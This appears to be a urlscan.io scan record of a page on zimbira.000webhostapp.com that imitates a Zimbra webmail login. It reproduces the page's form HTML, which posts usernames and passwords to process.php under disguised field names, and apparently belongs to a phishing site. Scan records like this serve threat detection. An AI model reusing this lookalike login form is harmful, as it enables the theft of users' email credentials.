zimbira.000webhostapp.com Open in urlscan Pro
145.14.144.156  Public Scan

URL: https://zimbira.000webhostapp.com/
Submission: On September 20 via api from JP — Scanned from NL

Form analysis 1 forms found in the DOM

Name: loginFormPOST process.php

<form method="post" name="loginForm" action="process.php">
  <table class="form">
    <tbody>
      <tr>
        <td><label for="username">Username:</label></td>
        <td><input id="username" class="zLoginField" name="aaa" type="text" value="" size="40" maxlength="1024" autocapitalize="off" autocorrect="off"></td>
      </tr>
      <tr>
        <td><label for="password">Password:</label></td>
        <td><input id="password" autocomplete="off" class="zLoginField" name="bbb" type="password" value="" size="40" maxlength="1024"></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
        <td class="submitTD">
          <input id="remember" value="1" type="checkbox" name="zrememberme">
          <label for="remember">Stay signed in</label>
          <input type="submit" class="ZLoginButton DwtButton" value="Sign In">
        </td>
      </tr>
      <tr>
        <td colspan="2">
          <hr>
        </td>
      </tr>
      <tr>
        <td>
          <label for="client">Version:</label>
        </td>
        <td>
          <div class="positioning">
            <select id="client" name="client" onchange="clientChange(this.options[this.selectedIndex].value)">
              <option value="preferred" selected=""> Default</option>
              <option value="advanced"> Advanced (Ajax)</option>
              <option value="mobile"> Mobile</option>
            </select>
            <script type="text/javascript">
            </script>
          </div>
        </td>
      </tr>
    </tbody>
  </table>
</form>

Text Content

Web Client

Username: Password:   Stay signed in

--------------------------------------------------------------------------------

Version:
Default Advanced (Ajax) Mobile